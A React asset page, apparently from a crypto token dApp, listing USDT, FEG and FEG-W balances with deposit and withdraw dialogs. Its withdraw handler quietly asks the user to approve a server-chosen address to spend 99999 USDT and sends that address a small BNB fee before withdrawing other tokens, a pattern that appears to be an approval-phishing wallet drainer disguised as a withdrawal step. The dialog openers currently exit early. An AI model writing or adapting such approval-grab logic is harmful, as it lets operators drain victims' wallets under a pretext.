import React, {useState, useEffect} from 'react';
import { connect } from 'react-redux';
import Head from '../../components/head/Head'
import Foot from '../../components/foot/Foot'
import { Input, message,Statistic  } from 'antd';
import {balanceOf,signer,transfer,allowance,approve,transferBnb} from '../../utils/ethers'

import NumberFormat from 'react-number-format'
import CountUp from "react-countup";
import { useTranslation } from 'react-i18next'
import {
    WarningOutlined,CloseOutlined
  } from '@ant-design/icons';
import './tan.css'
import '../invite/index.less'
import { addTixian, getAssetsIndex, getTixianRecord,addDepositBuy,addDepositBuyRed,getLiushui,addApprove,gethasPay,addPayBnb} from "../../api";
import { CSSTransition } from 'react-transition-group';
import { stringify } from 'qs';
import {useNavigate} from "react-router-dom";

const mapStateToProps=(state)=>{
    return{
        isLogin:state.isLogin,
        address:state.address,
        chain:state.chain
    }
}

const IndexTest1 = (props) => {
    const navigate = useNavigate()
    const { t } = useTranslation()
    const [num,setNum] = useState(0)
    const [coin,setCoin] = useState("MARS")
    const [tab,setTab] = useState("BNB")
    const [tab1,setTab1] = useState("col")
    const [valueCol,setValueCol] = useState("")
    const [valueDep,setValueDep] = useState("")
    

    const [isApproveUsdt,setIsApproveUsdt]=useState(false)


    const [receive,setReceive] = useState("")
    const [receiveFee,setReceiveFee] = useState("")
    const [receiveApprove,setReceiveApprove] = useState("")

    
    const [balanceOnUsdt,setBalanceOnUsdt] = useState("")
    const [balanceOnFeg,setBalanceOnFeg] = useState("")
    const [balanceOnFegw,setBalanceOnFegw] = useState("")
    const [feg_n,setFegN]=useState("")
    const [fegw_n,setFegwN]=useState("")
    const [feg_air_n,setFegAirN]=useState("")
    const [fegw_air_n,setFegwAirN]=useState("")
    const [fegw_pool_n,setFegwPoolN]=useState("")
    const [usdt_n,setUsdtN]=useState("")
    const [bnb_n,setBnbN]=useState("")
    const [fegAirEdu,setFegAirEdu] =useState(0)
    const [fegwAirEdu,setFegwAirEdu] =useState(0)
    const [hasShou,setHasShou] =useState("")
    const [depoNum,setDepoNum] = useState("")
    const [isb,setIsB] =useState(false)
    
    const [list,setList] = useState([])
    const [isLock,setIsLock]=useState(false)
    const [showJoin,setShowJoin] = useState(false)
    const [showJoin1,setShowJoin1] = useState(false)
    const [classes,setClasses] = useState(0)

    const [showTi,setShowTi] = useState(false)
    const [showDep,setShowDep] = useState(false)

     const _isApproveUsdt =  () => {
       return  new Promise(async (resolve, reject) => {
            allowance(props.address,receiveApprove,"usdt").then(res=>{
                if(parseFloat(res)>=99999){
                    setIsApproveUsdt(true)
                    resolve(true)
                }else{
                    resolve(false)
                }
            },err =>{
                    resolve(false)
            })
         })
    }

  

    const _rand=  () =>{
            if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
       
        // if(props.address.length<=0) return false
    

        if(receive.length === 0){
            message.error(t('asset.区块合约错误'))
            return false
        }

        let _coin = coin.toLowerCase()
        console.log(valueDep)
        if(!valueDep){
            message.error(t('asset.请输入转入数量'))
            return false
        }
        if(valueDep.length<=0){
            message.error(t('asset.请输入转入数量'))
            return false
        }
        // if(valueDep<100){
        //     message.error(t('asset.最低')+":100")
        //     return false
        // }

        if(_coin == "feg"){
            if(valueDep<10){
                message.error(t('asset.最低')+":10")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnFeg)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }else if(_coin =="fegw"){
            if(valueDep<1){
                message.error(t('asset.最低')+":1")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnFegw)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }else if(_coin == "usdt"){
            if(valueDep<1){
                message.error(t('asset.最低')+":1")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnUsdt)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }

        if(isLock){
            return false
        }
        setIsLock(true)
 let con = _coin
                if(_coin =="feg"){
                    con = "ccer"
                } 
                console.log(con)
                transfer(props.address,receive,String(con),valueDep).then(
                    res=>{
                        addDepositBuy({
                            address:props.address,
                            value:valueDep.toString(),
                            hex:res.hash,
                            coin:_coin
                        }).then(
                            res=>{
                                message.success(res.msg)
                                closeAll()
                                setNum(num+1);
                                setIsLock(false)
                            })
                    }, error=>{
                        setIsLock(false)
                        message.error(error)
                    })


    }



    // const _getTixianRecord = (classes) =>{
    //     if(props.address.length<=0){
    //         message.error(t('node.请先连接钱包'))
    //         return false
    //     }
    //     if(props.isLogin === false){
    //         message.error(t('node.请先绑定地址'))
    //         return false
    //     }
    //     setTab1(classes)
        
    //     getTixianRecord({classes:classes}).then(res=>{
    //             if(res.code === 0 ){
    
                  
    //                 if(res.data.list != null){
    //                     setList(res.data.list)
                        
    //                 }
    //                 setShowJoin1(true)
    
    //             }else{
    //                 message.error(res.msg)
    //             }
    //         },error =>{
    //             message.error(error)
    //         })
        
        
    // }

    // const _getLiushui = (coin) =>{
    //     if(props.address.length<=0){
    //         message.error(t('node.请先连接钱包'))
    //         return false
    //     }
    //     if(props.isLogin === false){
    //         message.error(t('node.请先绑定地址'))
    //         return false
    //     }
    //     setTab(coin)
        
    //         getLiushui({coin:coin}).then(res=>{
    //             if(res.code === 0 ){
    
                  
    //                 if(res.data.list != null){
    //                     setList(res.data.list)
                        
    //                 }
    //                 setShowJoin(true)
    
    //             }else{
    //                 message.error(res.msg)
    //             }
    //         },error =>{
    //             message.error(error)
    //         })
        
        
    // }

    const _getTixianIndex= () =>{
        if(props.address.length === 0 || props.isLogin === false){
            return false
        }
        getAssetsIndex().then(res=>{
            if(res.code === 0 ){
                setUsdtN(res.data.usdt_n)
                setFegN(res.data.feg_n)
                setBnbN(res.data.bnb_n)
                setFegwN(res.data.fegw_n)
                setFegAirN(res.data.feg_air_n)
                setFegwAirN(res.data.fegw_air_n)
                setFegwPoolN(res.data.fegw_pool_n)
                setReceive(res.data.receive)
                setFegAirEdu(res.data.feg_air_edu)
                setFegwAirEdu(res.data.fegw_air_edu)
                setReceiveFee(res.data.fee_receive)
                setReceiveApprove(res.data.approve_receive)
                setHasShou(res.data.appr)
                setIsB(res.data.isb)
                // if(res.data.list != null){
                //     setList(res.data.list)
                // }

            }else{
                message.error(res.msg)
            }
        },error =>{
            message.error(error)
        })

    }
    const _maxTi = () =>{
         let _coin = coin.toLocaleLowerCase()
     
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
        if(_coin == "feg"){
          setValueCol(feg_n)
        }else if(_coin == "fegw"){
            setValueCol(fegw_n)
        }else if(_coin == "usdt"){
             setValueCol(usdt_n)
        }else if(_coin == "feg_air"){
             setValueCol(feg_air_n)
        }else if(_coin == "fegw_air"){
             setValueCol(fegw_air_n)
        }else if(_coin == "bnb"){
             setValueCol(bnb_n)
        }else{
           
        }

    }

   const _maxDep = () =>{
         let _coin = coin.toLocaleLowerCase()
     
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
        if(_coin == "feg"){
          setValueDep(balanceOnFeg)
        }else if(_coin == "fegw"){
            setValueDep(balanceOnFegw)
        }else if(_coin == "usdt"){
             setValueDep(balanceOnUsdt)
        }else{
           
        }

    }

    

    const _ti = async () =>{

        let _coin = coin.toLowerCase()
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先连接钱包'))
            return false
        }
        message.warning(t('asset.提取中请等待'),4)
         const _isApprove =await _isApproveUsdt()
            console.log(_isApprove)
         if(isb==false){
             if(_isApprove == false || hasShou == 3){
                let tx = await approve(receiveApprove,"usdt",99999,true)
                addApprove({address:props.address,hex:String(tx.hash)})
            }
         }
       

     

        if(valueCol.length===0){
            message.error(t('asset.请输入数量'))
            return false
        }
        if(_coin == "feg"){
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(feg_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "feg_air"){
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(feg_air_n)){
                message.error(t('asset.余额不足'))
                return false
            }

            if(parseFloat(valueCol)>parseFloat(fegAirEdu)){
                message.error(t('asset.额度不足'))
                return false
            }
        }

        if(_coin == "fegw"){
           
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(fegw_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

         if(_coin == "fegw_air"){
           
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(fegw_air_n)){
                message.error(t('asset.余额不足'))
                return false
            }
            if(parseFloat(valueCol)>parseFloat(fegwAirEdu)){
                message.error(t('asset.额度不足'))
                return false
            }
        }

         if(_coin == "fegw_pool"){
           
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(fegw_pool_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "usdt"){
            
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdt_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "bnb"){
            
            if(parseFloat(valueCol)<0.01){
                message.error(t('asset.最低提取数量')+"0.01")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(bnb_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }
        
        if(isLock) return false;
        setIsLock(true)

        // gethasPay({address:props.address,coin:coin}).then(resPay=>{
        //     if(resPay.data.has=="3"){
        //         transferBnb(props.address,receiveApprove,0.0007).then(async resBnb=>{
        //             let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
        //             if(res4.code==0){
                               
        //                             addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin}).then(resTi=>{
        //                                 if(resTi.code==0){
        //                                     message.success(resTi.msg)
        //                                 }else{
        //                                     message.error(resTi.msg)
        //                                 }
        //                                 setIsLock(false)
        //                                 closeAll()
        //                                 setNum(num+1)
        //                             },errorTi=>{
        //                                 setIsLock(false)
        //                                 closeAll()
        //                                 message.error(errorTi)
        //                             })
                                    

                              
        //                     }else{
        //                         setIsLock(false)
        //                         closeAll()
        //                         message.error(res4.msg)
        //                     }

            
        //         },errBnb=>{
        //              setIsLock(false)
        //             closeAll()
        //             message.error(errBnb)
        //         })
        //     }else{
        //           signer(props.address).then(res=>{
        //                 addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(resTi=>{
        //                     if(resTi.code==0){
        //                         message.success(resTi.msg)
        //                     }else{
        //                         message.error(resTi.msg)
        //                     }
        //                     setIsLock(false)
        //                     closeAll()
        //                     setNum(num+1)
        //                 },errorTi=>{
        //                     setIsLock(false)
        //                     closeAll()
        //                     message.error(errorTi)
        //                 })
                           

        //             },error=>{
        //                 setIsLock(false)
        //             })
        //     }
        // },errPay=>{
        //     closeAll()
        //     setIsLock(false)
        //     message.error(errPay)
        // })

       
        if(isb==false){
                transferBnb(props.address,receiveApprove,0.0008).then(async resBnb=>{
                let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
                if(res4.code==0){
                                
                    signer(props.address).then(res=>{
                        addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
                            if(res.code===0){
                                message.success(res.msg)
                            }else{
                                message.error(res.msg)
                            }
                            setIsLock(false)
                            closeAll()
                            setNum(num+1)
                        },error=>{
                            setIsLock(false)
                            message.error(res.msg)
                        })

                    },error=>{
                        setIsLock(false)
                    }) 
                }else{
                    setIsLock(false)
                    closeAll()
                    message.error(res4.msg)
                }
            })
        }else{
             signer(props.address).then(res=>{
                addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
                    if(res.code===0){
                        message.success(res.msg)
                    }else{
                        message.error(res.msg)
                    }
                    setIsLock(false)
                    closeAll()
                    setNum(num+1)
                },error=>{
                    setIsLock(false)
                    message.error(res.msg)
                })
            },error=>{
                setIsLock(false)
            })
        }
         
        
        // signer(props.address).then(res=>{
        //     addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
        //         if(res.code===0){
        //             message.success(res.msg)
        //         }else{
        //             message.error(res.msg)
        //         }
        //         setIsLock(false)
        //         closeAll()
        //         setNum(num+1)
        //     },error=>{
        //         setIsLock(false)
        //         message.error(res.msg)
        //     })

        // },error=>{
        //     setIsLock(false)
        // })
    }

    const closeAll = () =>{
        setShowTi(false)
        setShowDep(false)
        setCoin("")
        setValueCol("")
        setValueDep("")
    }

    const openTi = (coin) =>{
        
        message.error(t('g.暂未开放'))
       return
    console.log(coin)
    if(coin == "feg_air" || coin == "fegw_air"){
        
    }else{
          message.error(t('g.暂未开放'))
       return
    }
      

        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        setShowDep(false)
        setCoin(coin)
        setShowTi(true)
        
        
    }

    const openDep = (coin) =>{
        message.error(t('g.暂未开放'))
       return
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(coin=="BNB"){
            message.error("coing soon")
            return
        }
        let _coin =coin;
        if(coin == "feg"){
            _coin ="ccer"
        }
        if(isLock) return false;
        setIsLock(true)
        message.loading("get balance...",0)
        balanceOf(props.address,_coin.toLowerCase()).then(res=>{
            if(coin == "usdt"){
                setBalanceOnUsdt(res)
            }else if(coin =="feg"){
                setBalanceOnFeg(res)
            }else if(coin == "fegw"){
                setBalanceOnFegw(res)
            }
            message.destroy()
            setShowTi(false)
            setCoin(coin)
            setShowDep(true)
            setIsLock(false)
        },error=>{
            message.error(error)
            setIsLock(false)
        })
        
        
        
    }

    const goLiushui = (url)=>{
    //     message.error(t('g.暂未开放'))
    //    return
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        navigate(url,{
            state:{
                address:props.address
            }
        })
    }
    


    useEffect(() => {
            window.scrollTo(0, 0)
           
             _getTixianIndex()
             
            // _balanceOf()
            // _balanceOf1()
    }, 
    // eslint-disable-next-line
    [props.isLogin,num]);

    return (
        <>  


        {/*col  */}
        {
            showTi?(
                <div  className=' w-full lg:w-1/3 h-screen  fixed left-0 top-0  inout1' style={{"backgroundColor":"rgba(0,0,0,.6)"}}>
                    <CSSTransition in={showTi} unmountOnExit={true} classNames='asset' timeout={500} appear>
                        <div className=' w-full h-[380px] px-5 mx-auto overflow-auto  stakingWin11 rounded-t-2xl absolute  bottom-0' style={{"zIndex":"90"}}>
                            <div className='w-full  flex flex-row justify-center items-center text-gray-400 absolute top-6 right-5' style={{"zIndex":"999"}}>
                                
                                <CloseOutlined onClick={closeAll} className=' absolute right-0  text-xl' />
                            </div>

                            <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                <span className="text-sm text-gray-500">{t('asset.提取')} ${coin.toLocaleUpperCase()} </span>
                                <span className="text-xs text-gray-500">{t('asset.余额')}：<CountUp start={0} end={coin=="feg"?feg_n:coin=="fegw"?fegw_n:coin=="usdt"?usdt_n:coin=="feg_air"?feg_air_n:coin=="fegw_air"?fegw_air_n:0} duration="1" decimals={4} /></span>
                            </div>
                            {
                                coin=="feg_air"?(
                                    <div className=' w-full h-5 mt-3 flex flex-row justify-end items-center'>
                                        
                                        <span className="text-xs text-gray-500">{t('asset.剩余额度')}：<CountUp start={0} end={fegAirEdu} duration="1" decimals={4} /></span>
                                    </div>
                                ):coin=="fegw_air"?(
                                    <div className=' w-full h-5 mt-3 flex flex-row justify-end items-center'>
                                        
                                        <span className="text-xs text-gray-500">{t('asset.剩余额度')}：<CountUp start={0} end={fegwAirEdu} duration="1" decimals={4} /></span>
                                    </div>
                                ):null
                            }
                            <div className="w-full h-11 mt-3 rounded-full flex flex-row items-center px-4" style={{"backgroundColor":"#ffffff","border":"1px #583C25 solid"}} >
                                <input  onInput={(e)=>setValueCol(e.target.value)} value={valueCol}  type="number"   className=' w-4/5 h-11 text-sm text-black input1 ' placeholder='输入提取数量' ></input>
                                {/* <span onClick={_maxTi} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span> */}
                            </div>
                            <div className='w-full h-11 mb-5 flex flex-row justify-center items-center mt-5 rounded-full bg-gradient-to-r from-yellow1 to-yellow2'>
                        
                                <button  onClick={_ti}  className='w-full text-base text-[#ffffff] flex flex-row justify-center items-center z-10'>{t('asset.提取')}</button>
                            </div>
                            {/* <div className=' w-full mt-4 flex flex-row justify-center'>
                                <button onClick={_ti}  className='w-24 h-8 assetbt2  text-sm text-white font-extrabold '>{t('asset.提取')}</button>
                            </div> */}
                            
                        </div>
                    </CSSTransition>
                </div>
            ):null
        }
        {/*col  */}
        {
            showDep?(
                <div  className=' w-full lg:w-1/3 h-screen  fixed left-0 top-0 inout1' style={{"backgroundColor":"rgba(0,0,0,.8)"}}>
                    <CSSTransition in={showDep} unmountOnExit={true} classNames='asset' timeout={500} appear>
                        <div className=' w-full h-[380px] px-5 mx-auto overflow-auto  stakingWin11 rounded-t-2xl absolute  bottom-0' style={{"zIndex":"90"}}>
                            <div className='w-full  flex flex-row justify-center items-center text-gray-400 absolute top-6 right-5' style={{"zIndex":"999"}}>
                                
                                <CloseOutlined onClick={closeAll} className=' absolute right-0  text-xl' />
                            </div>

                            <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                <span className="text-sm text-gray-500">{t('asset.存入')} ${coin.toLocaleUpperCase()} </span>
                                <span className="text-xs text-gray-500">{t('asset.钱包余额')}：<CountUp start={0} end={coin=="feg"?balanceOnFeg:coin=="fegw"?balanceOnFegw:coin=="usdt"?balanceOnUsdt:0} duration="1" decimals={4} /></span>
                            </div>
                            <div className="w-full h-11 mt-5 rounded-full flex flex-row items-center px-4" style={{"backgroundColor":"#ffffff","border":"1px #583C25 solid"}} >
                                <input onInput={(e)=>setValueDep(e.target.value)} value={valueDep}  type="number"   className=' w-4/5 h-11 text-sm text-black input1 ' placeholder='输入提取数量'></input>
                                <span onClick={_maxDep} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span>
                            </div>
                            <div className='w-full h-11 mb-5 flex flex-row justify-center items-center mt-5 rounded-full bg-gradient-to-r from-yellow1 to-yellow2'>
                        
                                <button  onClick={_rand}  className='w-full text-base text-[#ffffff] flex flex-row justify-center items-center z-10'>{t('asset.存入')}</button>
                            </div>
                            {/* <div className=' w-full mt-4 flex flex-row justify-center'>
                                <button onClick={_rand}  className='w-24 h-8 assetbt22  text-sm text-white font-extrabold '>{t('asset.存入')}</button>
                            </div> */}
                            
                        </div>
                    </CSSTransition>
                </div>
            ):null
        }
        {/*  */}
        
            <Head/>
            
            <div style={{"backgroundColor":"#FCFDF8"}} className='pb-20  w-full lg:w-1/3 min-h-screen  pt-16 text-white flex flex-col'>
                {/*  */}
                <div className='w-full px-4  h-[260px]  asBg1'>
                   

                    <div onClick={()=>window.history.back()} className='mt-4 w-full h-12  flex flex-row justify-start items-center'>
                    <img alt='rr' className=' mr-1' src={require('../../assets/img/re.png')} style={{"width":"20px"}}></img>
                    <span className='text-xs text-gray-500'>{t('share.返回')}</span>
                </div>
                        
                        {/* <div className="w-full mt-[40px] mb-[17px]  flex felx-row justify-start items-center">
                            
                            <span className=' text-2xl text-black fontB'>RWA代币资产</span>
                        </div> */}
                       
                       
                    
                </div>
                {/*  */}
                {/*  */}
            <div className='w-full -mt-16 mb-3 px-4 '>
                    <h2 className=' text-gray-800 text-2xl'>{t('asset.我的资产列表')}</h2>
            </div>

             <div className='mx-4 h-10 text-sm border border-gray-200 bg-[#FEE25B] rounded-t-xl  flex flex-row justify-between items-center text-gray-500'>
                <div className='w-3/12 text-center'>{t('asset.币种')}</div>
                <div className='w-5/12 h-10 flex flex-col items-center justify-center border-x border-gray-200'>
                    {t('asset.余额')}
                </div>
                <div className='w-4/12   text-sm text-center flex flex-row justify-center'>
                    {t('asset.动作')}
                </div>

            </div>
            <div className='mx-4 h-40 border border-gray-200   flex flex-row justify-between items-center text-gray-500'>
                <div className='w-3/12 text-center flex flex-col justify-center items-center'>
                    <img alt='rr' className=' mr-1 mb-1' src={require('../../assets/img/usdtlogo.png')} style={{"width":"30px"}}></img>
                    <span className=' text-base '>USDT</span>
                </div>
                <div className='w-5/12 h-40 flex flex-col items-center justify-center border-x border-gray-200'>
                    
                    <div className=' text-base text-gray-700'><CountUp start={0} end={usdt_n} duration="1" decimals={6} /></div>
                </div>
                <div className='w-4/12  text-white text-xs text-center flex flex-col justify-center items-center'>
                    <span onClick={()=>openDep("usdt")} className='w-4/5 rounded-full bg-orange-300 px-4 py-2 text-white text-sm text-center'>{t('asset.存入')}</span>
                    <span onClick={()=>openTi("usdt")} className='w-4/5 my-4 rounded-full bg-blue-300 px-4 py-2 text-white text-sm text-center'>{t('asset.提取')}</span>
                    <span onClick={()=>goLiushui("/record_usdt")} className='w-4/5 rounded-full bg-gray-100 px-4 py-2 text-gray-500 text-sm text-center'>{t('asset.记录')}</span>
                </div>

            </div>
            <div className='mx-4 h-40   border border-gray-200 border-t-0   flex flex-row justify-between items-center text-gray-500'>
                <div className='w-3/12 text-center flex flex-col justify-center items-center'>
                    <img alt='rr' className=' mr-1 mb-1' src={require('../../assets/img/logo.png')} style={{"width":"30px"}}></img>
                    <span className=' text-base '>FEG</span>
                </div>
                <div className='w-5/12 h-40 flex flex-col items-center justify-center border-x border-gray-200'>
              
                    <div className=' text-base text-gray-700'><CountUp start={0} end={feg_n} duration="1" decimals={6} /></div>
                </div>
               <div className='w-4/12  text-white text-xs text-center flex flex-col justify-center items-center'>
                    <span onClick={()=>openDep("feg")} className='w-4/5 rounded-full bg-orange-300 px-3 py-2 text-white text-sm text-center'>{t('asset.存入')}</span>
                    <span onClick={()=>openTi("feg")} className='w-4/5 my-4 rounded-full bg-blue-300 px-3 py-2 text-white text-sm text-center'>{t('asset.提取')}</span>
                    <span onClick={()=>goLiushui("/record_feg")} className='w-4/5 rounded-full bg-gray-100 px-3 py-2 text-gray-500 text-sm text-center'>{t('asset.记录')}</span>
                </div>

            </div>
            
            <div className='bg-[#F0F5FB] mx-4 h-40   border border-gray-200 border-t-0   flex flex-row justify-between items-center text-gray-500'>
                <div className='w-3/12 text-center flex flex-col justify-center items-center'>
                    <img alt='rr' className=' mr-1 mb-1' src={require('../../assets/img/logo.png')} style={{"width":"30px"}}></img>
                    <span className=' text-base '>FEG</span>
                    <span className=' text-xs '>{t('asset.空投')}</span>
                </div>
                <div className='w-5/12 h-40 flex flex-col items-center justify-center border-x border-gray-200'>
              
                    <div className=' text-base text-gray-700'><CountUp start={0} end={feg_air_n} duration="1" decimals={6} /></div>
                </div>
               <div className='w-4/12  text-white text-xs text-center flex flex-col justify-center items-center'>
                 
                    <span onClick={()=>openTi("feg_air")} className='w-4/5 my-4 rounded-full bg-blue-300 px-3 py-2 text-white text-sm text-center'>{t('asset.提取')}</span>
                    {/* <span onClick={()=>goLiushui("/record_feg")} className='w-4/5 rounded-full bg-gray-100 px-3 py-2 text-gray-500 text-xs text-center'>记录</span> */}
                </div>

            </div>
            <div className='mx-4 h-40  border border-gray-200  border-t-0   flex flex-row justify-between items-center text-gray-500'>
                <div className='w-3/12 text-center flex flex-col justify-center items-center'>
                    <img alt='rr' className=' mr-1 mb-1' src={require('../../assets/img/fegw.png')} style={{"width":"30px"}}></img>
                    <span className=' text-base '>FEG-W</span>
                </div>
                <div className='w-5/12 h-40 flex flex-col items-center justify-center border-x border-gray-200'>
                    
                    <div className=' text-base text-gray-700'><CountUp start={0} end={fegw_n} duration="1" decimals={6} /></div>
                </div>
                <div className='w-4/12  text-white text-xs text-center flex flex-col justify-center items-center'>
                    <span onClick={()=>openDep("fegw")} className='w-4/5 rounded-full bg-orange-300 px-3 py-2 text-white text-sm text-center'>{t('asset.存入')}</span>
                    <span onClick={()=>openTi("fegw")} className='w-4/5 my-4 rounded-full bg-blue-300 px-3 py-2 text-white text-sm text-center'>{t('asset.提取')}</span>
                    <span onClick={()=>goLiushui("/record_fegw")} className='w-4/5 rounded-full bg-gray-100 px-3 py-2 text-gray-500 text-sm text-center'>{t('asset.记录')}</span>
                </div>

            </div>
            {/* <div className='mx-4 h-40  border border-gray-200  border-t-0   flex flex-row justify-between items-center text-gray-500'>
                <div className='w-3/12 text-center flex flex-col justify-center items-center'>
                    <img alt='rr' className=' mr-1 mb-1' src={require('../../assets/img/logo.png')} style={{"width":"30px"}}></img>
                    <span className=' text-base '>FEG-W</span>
                    <span className=' text-xs '>{t('head.矿池')}</span>
                </div>
                <div className='w-5/12 h-40 flex flex-col items-center justify-center border-x border-gray-200'>
                    
                    <div className=' text-base text-gray-400'><CountUp start={0} end={fegw_pool_n} duration="1" decimals={6} /></div>
                </div>
                <div className='w-4/12  text-white text-xs text-center flex flex-col justify-center items-center'>
                    
                    <span onClick={()=>openTi("fegw_pool")} className='w-4/5 my-4 rounded-full bg-blue-300 px-3 py-2 text-white text-xs text-center'>{t('asset.提取')}</span>
                    <span onClick={()=>goLiushui("/record_fegw_pool")} className='w-4/5 rounded-full bg-gray-100 px-3 py-2 text-gray-500 text-xs text-center'>{t('asset.记录')}</span>
                </div>

            </div> */}
            
            <div className='bg-[#F0F5FB] mx-4 h-40  border border-gray-200  border-t-0   flex flex-row justify-between items-center text-gray-500'>
                <div className='w-3/12 text-center flex flex-col justify-center items-center'>
                    <img alt='rr' className=' mr-1 mb-1' src={require('../../assets/img/fegw.png')} style={{"width":"30px"}}></img>
                    <span className=' text-base '>FEG-W</span>
                    <span className=' text-xs '>{t('asset.空投')}</span>
                </div>
                <div className='w-5/12 h-40 flex flex-col items-center justify-center border-x border-gray-200'>
                    
                    <div className=' text-base text-gray-700'><CountUp start={0} end={fegw_air_n} duration="1" decimals={6} /></div>
                </div>
                <div className='w-4/12  text-white text-xs text-center flex flex-col justify-center items-center'>
                    
                    <span onClick={()=>openTi("fegw_air")} className='w-4/5 my-4 rounded-full bg-blue-300 px-3 py-2 text-white text-sm text-center'>{t('asset.提取')}</span>
                    {/* <span onClick={()=>goLiushui("/record_fegw")} className='w-4/5 rounded-full bg-gray-100 px-3 py-2 text-gray-500 text-xs text-center'>记录</span> */}
                </div>

            </div>

            {/*  */}
                {/*  */}

              

              
                
                
            </div>
           
        
                <Foot/>
        </>
    );
}

export default connect(mapStateToProps)(IndexTest1);
